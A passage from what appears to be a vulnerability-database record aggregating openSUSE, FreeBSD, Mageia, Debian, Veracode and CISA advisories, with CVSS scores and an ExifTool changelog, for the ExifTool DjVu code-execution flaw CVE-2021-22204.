Bech Jensen)\n * Added a new Canon LensType\n * Decode more GPS information from Blackvue dashcam videos\n * Decode a couple of new NikonSettings tags (thanks Warren Hatch)\n * Decode a few new RIFF tags\n * Improved Validate option to add minor warning if standard XMP is missing\n xpacket wrapper\n * Avoid decoding some large arrays in DNG images to improve performance\n unless the -m option is used\n * Patched bug that could give runtime warning when trying to write an\n empty XMP structure\n * Fixed decoding of ImageWidth/Height for JPEG XL images\n * Fixed problem were Microsoft Xtra tags couldn't be deleted\n\n version 12.24:\n\n * Added a new PhaseOne RawFormat value (thanks LibRaw)\n * Decode a new Sony tag (thanks Jos Roost)\n * Decode a few new Panasonic and FujiFilm tags (thanks LibRaw and\n Greybeard)\n * Patched security vulnerability in DjVu reader\n * Updated acdsee.config in distribution (thanks StarGeek)\n * Recognize AutoCAD DXF files\n * More work on experimental JUMBF read support\n * More work on experimental JPEG XL read/write support\n\n version 12.23:\n\n * Added support for Olympus ORI files\n * Added experimental read/write support for JPEG XL images\n * Added experimental read support for JUMBF metadata in JPEG and Jpeg2000\n images\n * Added built-in support for parsing GPS track from Denver ACG-8050 videos\n with the -ee option\n * Added a some new Sony lenses (thanks Jos Roost and LibRaw)\n * Changed priority of Samsung trailer tags so the first DepthMapImage\n takes precedence when -a is not used\n * Improved identification of M4A audio files\n * Patched to avoid escaping ',' in \"Binary data\" message when\n -struct is used\n * Removed Unknown flag from MXF VideoCodingSchemeID tag\n * Fixed -forcewrite=EXIF to apply to EXIF in binary header of EPS files\n * API Changes:\n + Added BlockExtract option\n\n version 12.22:\n\n * Added a few new Sony LensTypes and a new SonyModelID (thanks Jos Roost\n and LibRaw)\n * Added Extra BaseName tag\n * Added a new CanonModelID (thanks LibRaw)\n * Decode timed GPS from unlisted programs in M2TS videos with the -ee3\n option\n * Decode more Sony rtmd tags\n * Decode some tags for the Sony ILME-FX3 (thanks Jos Roost)\n * Allow negative values to be written to XMP-aux:LensID\n * Recognize HEVC video program in M2TS files\n * Enhanced -b option so --b suppresses tags with binary data\n * Improved flexibility when writing GPS coordinates:\n + Now pulls latitude and longitude from a combined GPSCoordinates string\n + Recognizes the full word \"South\" and \"West\" to write negative\n coordinates\n * Improved warning when trying to write an integer QuickTime date/time tag\n and Time::Local is not available\n * Convert GPSSpeed from mph to km/h in timed GPS from Garmin MP4 videos\n\n version 12.21:\n\n * Added a few new iOS QuickTime tags\n * Decode a couple more Sony rtmd tags\n * Patch to avoid possible \"Use of uninitialized value\" warning when\n attempting to write QuickTime date/time tags with an invalid value\n * Fixed problem writing Microsoft Xtra tags\n * Fixed Windows daylight savings time patch for file times that was broken\n in 12.19 (however directory times will not yet handle DST properly)\n\n version 12.20:\n\n * Added ability to write some Microsoft Xtra tags in MOV/MP4 videos\n * Added two new Canon LensType values (thanks Norbert Wasser)\n * Added a new Nikon LensID\n * Fixed problem reading FITS comments that start before column 11\n\n version 12.19:\n\n * Added -list_dir option\n * Added the \"ls-l\" Shortcut tag\n * Extract Comment and History from FITS files\n * Enhanced FilePermissions to include device type (similar to \"ls -l\")\n * Changed the name of Apple ContentIdentifier tag to MediaGroupUUID\n (thanks Neal Krawetz)\n * Fixed a potential \"substr outside of string\" runtime error when reading\n corrupted EXIF\n * Fixed edge case where NikonScanIFD may not be copied properly when\n copying MakerNotes to another file\n * API Changes:\n + Added ability to read/write System tags of directories\n + Enhanced GetAllGroups() to support family 7 and take\n optional ExifTool reference\n + Changed QuickTimeHandler option default to 1\n\n version 12.18:\n\n * Added a new SonyModelID\n * Decode a number of Sony tags for the ILCE-1 (thanks Jos Roost)\n * Decode a couple of new Canon tags (thanks LibRaw)\n * Patched to read differently formatted UserData:Keywords as written by\n iPhone\n * Patched to tolerate out-of-order Nikon MakerNote IFD entries when\n obtaining tags necessary for decryption\n * Fixed a few possible Condition warnings for some NikonSettings tags\n\n version 12.17:\n\n * Added a new Canon FocusMode value\n * Added a new FujiFilm FilmMode value\n * Added a number of new XMP-crs tags (thanks Herb)\n * Decode a new H264 MDPM tag\n * Allow non-conforming lower-case XMP boolean \"true\" and \"false\" values to\n be written, but only when print conversion is disabled\n * Improved Validate option to warn about non-capitalized boolean XMP values\n * Improved logic for setting GPSLatitude/LongitudeRef values when writing\n * Changed -json and -php options so the -a option is implied even without\n the -g option\n * Avoid extracting audio/video data from AVI videos when -ee\n -u is used\n * Patched decoding of Canon ContinuousShootingSpeed for newer firmware\n versions of the EOS-1DXmkIII\n * Re-worked LensID patch of version 12.00 (github issue #51)\n * Fixed a few typos in newly-added NikonSettings tags (thanks Herb)\n * Fixed problem where group could not be specified for PNG-pHYs tags when\n writing version 12.16:\n * Extract another form of video subtitle text\n * Enhanced -ee option with -ee2 and -ee3 to allow parsing of the H264\n video stream in MP4 files\n * Changed a Nikon FlashMode value\n * Fixed problem that caused a failed DPX test on Strawberry Perl\n * API Changes:\n + Enhanced ExtractEmbedded option\n\n version 12.15:\n\n * Added a couple of new Sony LensType values (thanks LibRaw and Jos Roost)\n * Added a new Nikon FlashMode value (thanks Mike)\n * Decode NikonSettings (thanks Warren Hatch)\n * Decode thermal information from DJI RJPEG images\n * Fixed extra newline in -echo3 and -echo4 outputs added in version 12.10\n * Fixed out-of-memory problem when writing some very large PNG files under\n Windows\n\n version 12.14:\n\n * Added support for 2 more types of timed GPS in video files (that makes\n 49 different formats now supported)\n * Added validity check for PDF trailer dictionary Size\n * Added a new Pentax LensType\n * Extract metadata from Jpeg2000 Association box\n * Changed -g:XX:YY and -G:XX:YY options to show empty strings for\n non-existent groups\n * Patched to issue warning and avoid writing date/time values with a zero\n month or day number\n * Patched to avoid runtime warnings if trying to set FileName to an empty\n string\n * Fixed issue that could cause GPS test number 12 to fail on some systems\n * Fixed problem extracting XML as a block from Jpeg2000 images, and\n extract XML tags in the XML group instead of XMP\n - Update URL\n\n update to 12.13:\n\n * Add time zone automatically to most string-based QuickTime date/time\n tags when writing unless the PrintConv option is disabled\n * Added -i HIDDEN option to ignore files with names that start with \".\"\n * Added a few new Nikon ShutterMode values (thanks Jan Skoda)\n * Added ability to write Google GCamera MicroVideo XMP tags\n * Decode a new Sony tag (thanks LibRaw)\n * Changed behaviour when writing only pseudo tags to return an error and\n avoid writing any other tags if writing FileName fails\n * Print \"X image files read\" message even if only 1 file is read when at\n least\n one other file has failed the -if condition\n * Added ability to geotag from DJI CSV log files\n * Added a new CanonModelID\n * Added a couple of new Sony LensType values (thanks LibRaw)\n * Enhanced -csvDelim option to allow \"\\t\", \"\\n\", \"\\r\" and \"\\\\\"\n * Unescape \"\\b\" and \"\\f\" in imported JSON values\n * Fixed bug introduced in 12.10 which generated a \"Not an integer\" warning\n when attempting to shift some QuickTime date/time tags\n * Fixed shared-write permission problem with -@ argfile when using\n -stay_open and a filename containing special characters on Windows\n * Added -csvDelim option\n * Added new Canon and Olympus LensType values (thanks LibRaw)\n * Added a warning if ICC_Profile is deleted from an image (github issue\n #63)\n * EndDir() function for -if option now works when -fileOrder is used\n * Changed FileSize conversion to use binary prefixes since that is how the\n conversion is currently done (eg. MiB instead of MB)\n * Patched -csv option so columns aren't resorted when using -G option and\n one\n of the tags is missing from a file\n * Fixed incompatiblity with Google Photos when writing\n UserData:GPSCoordinates to MP4 videos\n * Fixed problem where the tags available in a -p format string were\n limited to the same as the -if[NUM] option when NUM was specified\n * Fixed incorrect decoding of SourceFileIndex/SourceDirectoryIndex for\n Ricoh models\n\n Update to 12.10\n\n * Added -validate test for proper TIFF magic number in JPEG EXIF header\n * Added support for Nikon Z7 LensData version 0801\n * Added a new XMP-GPano tag\n * Decode ColorData for the Canon EOS 1DXmkIII\n * Decode more tags for the Sony ILCE-7SM3\n * Automatically apply QuickTimeUTC option for CR3 files\n * Improved decoding of XAttrMDLabel from MacOS files\n * Ignore time zones when writing date/time values and using the -d option\n * Enhanced -echo3 and -echo4 options to allow exit status to be returned\n * Changed -execute so the -q option no longer suppresses the \"{ready}\"\n message when a synchronization number is used\n * Added ability to copy CanonMakerNotes from CR3 images to other file types\n * Added read support for ON1 presets file (.ONP)\n * Added two new CanonModelID values\n * Added trailing \"/\" when writing QuickTime:GPSCoordinates\n * Added a number of new XMP-crs tags\n * Added a new Sony LensType (thanks Jos Roost)\n * Added a new Nikon Z lens (thanks LibRaw)\n * Added a new Canon LensType\n * Decode ColorData for Canon EOS R5/R6\n * Decode a couple of new HEIF tags\n * Decode FirmwareVersion for Canon M50\n * Improved decoding of Sony CreativeStyle tags\n * Improved parsing of Radiance files to recognize comments\n * Renamed GIF AspectRatio tag to PixelAspectRatio\n * Patched EndDir() feature so subdirectories are always processed when -r\n is used (previously, EndDir() would end processing of a directory\n completely)\n * Avoid loading GoPro module unnecessarily when reading MP4 videos from\n some other cameras\n * Fixed problem with an incorrect naming of CodecID tags in some MKV videos\n * Fixed verbose output to avoid \"adding\" messages for existing flattened\n XMP tags\n * Added a new Sony LensType\n * Recognize Mac OS X xattr files\n * Extract ThumbnailImage from MP4 videos of more dashcam models\n * Improved decoding of a number of Sony tags\n * Fixed problem where the special -if EndDir() function didn't work\n properly for directories after the one in which it was initially called\n * Patched to read DLL files which don't have a .rsrc section\n * Patched to support new IGC date format when geotagging\n * Patched to read DLL files with an invalid size in the header\n * Added support for GoPro .360 videos\n * Added some new Canon RF and Nikkor Z lenses\n * Added some new Sony LensType and CreativeStyle values and decode some\n ILCE-7C tags\n * Added a number of new Olympus SceneMode values\n * Added a new Nikon LensID\n * Decode more timed metadata from Insta360 videos\n * Decode timed GPS from videos of more Garmin dashcam models\n * Decode a new GoPro video tag\n * Reformat time-only EventTime values when writing and prevent arbitrary\n strings from being written\n * Patched to accept backslashes in SourceFile entries for -csv option\n\n update to 12.06\n\n * Added read support for Lyrics3 metadata (and fixed problem where APE\n metadata may be ignored if Lyrics3 exists)\n * Added a new Panasonic VideoBurstMode value\n * Added a new Olympus MultipleExposureMode value\n * Added a new Nikon LensID\n * Added back conversions for XMP-dwc EventTime that were removed in 12.04\n with a patch to allow time-only values\n * Decode GIF AspectRatio\n * Decode Olympus FocusBracketStepSize\n * Extract PNG iDOT chunk in Binary format with the name AppleDataOffsets\n * Process PNG images which do not start with mandatory IHDR chunk\n * Added a new Panasonic SelfTimer value\n * Decode a few more DPX tags\n * Extract AIFF APPL tag as ApplicationData\n * Fixed bug writing QuickTime ItemList 'gnre' Genre values\n * Fixed an incorrect value for Panasonic VideoBurstResolution\n * Fixed problem when applying a time shift to some invalid makernote\n date/time values\n\n update to 12.04:\n\n * See /usr/share/doc/packages/perl-Image-ExifTool/Change\n\n update to 11.50, see Image-ExifTool-11.50.tar.gz for details\n\n Update to version 11.30:\n\n * Add a new Sony/Minolta LensType.\n * Decode streaming metadata from TomTom Bandit Action Cam MP4 videos.\n * Decode Reconyx HF2 PRO maker notes.\n * Decode ColorData for some new Canon models.\n * Enhanced -geotag feature to set AmbientTemperature if available.\n * Remove non-significant spaces from some DICOM values.\n * Fix possible \"'x' outside of string\" error when reading corrupted EXIF.\n * Fix incorrect write group for GeoTIFF tags.\n\n Update to version 11.29\n\n * See /usr/share/doc/packages/perl-Image-ExifTool/Changes\n\n Update to version 11.27\n\n * See /usr/share/doc/packages/perl-Image-ExifTool/Changes\n\n Update to version 11.24\n\n * See /usr/share/doc/packages/perl-Image-ExifTool/Changes\n\n Update to version 11.11 (changes since 11.01):\n\n * See /usr/share/doc/packages/perl-Image-ExifTool/Changes\n\n Update to 11.01:\n\n * Added a new ProfileCMMType\n * Added a Validate warning about non-standard EXIF or XMP in PNG images\n * Added a new Canon LensType\n * Decode a couple more PanasonicRaw tags\n * Patched to avoid adding tags to QuickTime videos with multiple 'mdat'\n atoms --> avoids potential corruption of these videos!\n\n Update to 11.00:\n\n * Added read support for WTV and DVR-MS videos\n * Added print conversions for some ASF date/time tags\n * Added a new SonyModelID\n * Decode a new PanasonicRaw tag\n * Decode some new Sony RX100 VI tags\n * Made Padding and OffsetSchema tags \"unsafe\" so they aren't copied by\n default\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.2:\n\n zypper in -t patch openSUSE-2021-707=1\n\n - openSUSE Backports SLE-15-SP2:\n\n zypper in -t patch openSUSE-2021-707=1\n\n - openSUSE Backports SLE-15-SP1:\n\n zypper in -t patch openSUSE-2021-707=1", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-11T00:00:00", "type": "suse", "title": "Security update for perl-Image-ExifTool (important)", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2021-05-11T00:00:00", "id": "OPENSUSE-SU-2021:0707-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/SLQ4XG6SNL6OL7SHPBZLVWYCAEZGZW5X/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2022-03-25T13:58:02", "description": "\n\nDebian Security Advisory reports:\n\nA vulnerability was discovered in libimage-exiftool-perl, a library and program to read and write meta information in multimedia files, which may result in execution of arbitrary code if a malformed DjVu file is processed.\n\n\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-04T00:00:00", "type": "freebsd", "title": "Security Vulnerability found in ExifTool", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2021-01-04T00:00:00", "id": "955F377E-7BC3-11EC-A51C-7533F219D428", "href": "https://vuxml.freebsd.org/freebsd/955f377e-7bc3-11ec-a51c-7533f219d428.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "mageia": [{"lastseen": "2022-04-18T11:19:35", "description": "Improper neutralization of user data in the DjVu file format in ExifTool versions 7.44 and up allows arbitrary code execution when parsing the malicious image (CVE-2021-22204). \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-16T20:22:25", "type": "mageia", "title": "Updated perl-Image-ExifTool package fixes a security vulnerability\n", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2021-06-16T20:22:25", "id": "MGASA-2021-0259", "href": "https://advisories.mageia.org/MGASA-2021-0259.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2021-12-05T02:48:00", "description": "- -----------------------------------------------------------------------\nDebian LTS Advisory DLA-2663-1 debian-lts@lists.debian.org\nhttps://www.debian.org/lts/security/ Utkarsh Gupta\nMay 16, 2021 https://wiki.debian.org/LTS\n- -----------------------------------------------------------------------\n\nPackage : libimage-exiftool-perl\nVersion : 10.40-1+deb9u1\nCVE ID : CVE-2021-22204\nDebian Bug : 987505\n\nA vulnerability was discovered in libimage-exiftool-perl, a library\nand program to read and write meta information in multimedia files,\nwhich may result in execution of arbitrary code if a malformed DjVu\nfile is processed.\n\nFor Debian 9 stretch, this problem has been fixed in version\n10.40-1+deb9u1.\n\nWe recommend that you upgrade your libimage-exiftool-perl packages.\n\nFor the detailed security status of libimage-exiftool-perl please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/libimage-exiftool-perl\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-16T09:42:01", "type": "debian", "title": "[SECURITY] [DLA 2663-1] libimage-exiftool-perl security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2021-05-16T09:42:01", "id": "DEBIAN:DLA-2663-1:D8707", "href": "https://lists.debian.org/debian-lts-announce/2021/05/msg00018.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-22T14:51:36", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4910-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nMay 02, 2021 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : libimage-exiftool-perl\nCVE ID : CVE-2021-22204\nDebian Bug : 987505\n\nA vulnerability was discovered in libimage-exiftool-perl, a library and\nprogram to read and write meta information in multimedia files, which\nmay result in execution of arbitrary code if a malformed DjVu file is\nprocessed.\n\nFor the stable distribution (buster), this problem has been fixed in\nversion 11.16-1+deb10u1.\n\nWe recommend that you upgrade your libimage-exiftool-perl packages.\n\nFor the detailed security status of libimage-exiftool-perl please refer\nto its security tracker page at:\nhttps://security-tracker.debian.org/tracker/libimage-exiftool-perl\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-02T15:47:14", "type": "debian", "title": "[SECURITY] [DSA 4910-1] libimage-exiftool-perl security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2021-05-02T15:47:14", "id": "DEBIAN:DSA-4910-1:4845B", "href": "https://lists.debian.org/debian-security-announce/2021/msg00091.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-22T10:20:44", "description": "- -----------------------------------------------------------------------\nDebian LTS Advisory DLA-2663-1 debian-lts@lists.debian.org\nhttps://www.debian.org/lts/security/ Utkarsh Gupta\nMay 16, 2021 https://wiki.debian.org/LTS\n- -----------------------------------------------------------------------\n\nPackage : libimage-exiftool-perl\nVersion : 10.40-1+deb9u1\nCVE ID : CVE-2021-22204\nDebian Bug : 987505\n\nA vulnerability was discovered in libimage-exiftool-perl, a library\nand program to read and write meta information in multimedia files,\nwhich may result in execution of arbitrary code if a malformed DjVu\nfile is processed.\n\nFor Debian 9 stretch, this problem has been fixed in version\n10.40-1+deb9u1.\n\nWe recommend that you upgrade your libimage-exiftool-perl packages.\n\nFor the detailed security status of libimage-exiftool-perl please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/libimage-exiftool-perl\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-16T09:42:01", "type": "debian", "title": "[SECURITY] [DLA 2663-1] libimage-exiftool-perl security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2021-05-16T09:42:01", "id": "DEBIAN:DLA-2663-1:BF6CA", "href": "https://lists.debian.org/debian-lts-announce/2021/05/msg00018.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-21T18:14:57", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4910-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nMay 02, 2021 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : libimage-exiftool-perl\nCVE ID : CVE-2021-22204\nDebian Bug : 987505\n\nA vulnerability was discovered in libimage-exiftool-perl, a library and\nprogram to read and write meta information in multimedia files, which\nmay result in execution of arbitrary code if a malformed DjVu file is\nprocessed.\n\nFor the stable distribution (buster), this problem has been fixed in\nversion 11.16-1+deb10u1.\n\nWe recommend that you upgrade your libimage-exiftool-perl packages.\n\nFor the detailed security status of libimage-exiftool-perl please refer\nto its security tracker page at:\nhttps://security-tracker.debian.org/tracker/libimage-exiftool-perl\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-02T15:47:14", "type": "debian", "title": "[SECURITY] [DSA 4910-1] libimage-exiftool-perl security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2021-05-02T15:47:14", "id": "DEBIAN:DSA-4910-1:A1513", "href": "https://lists.debian.org/debian-security-announce/2021/msg00091.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "veracode": [{"lastseen": "2022-07-26T13:50:50", "description": "perl-image-exiftool is vulnerable to remote code execution. A lack of proper neutralization of user data in the DjVu file format in ExifTool allows an attacker to arbitrary code execution by sending a malicious image (jpg, tiff, mp4 and many more).\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-25T01:28:00", "type": "veracode", "title": "Remote Code Execution (RCE)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2022-05-11T20:32:41", "id": "VERACODE:30159", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-30159/summary", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "Improper neutralization of user data in the DjVu file format in Exiftool versions 7.44 and up allows arbitrary code execution when parsing the malicious image", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-17T00:00:00", "type": "cisa_kev", "title": "ExifTool Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": 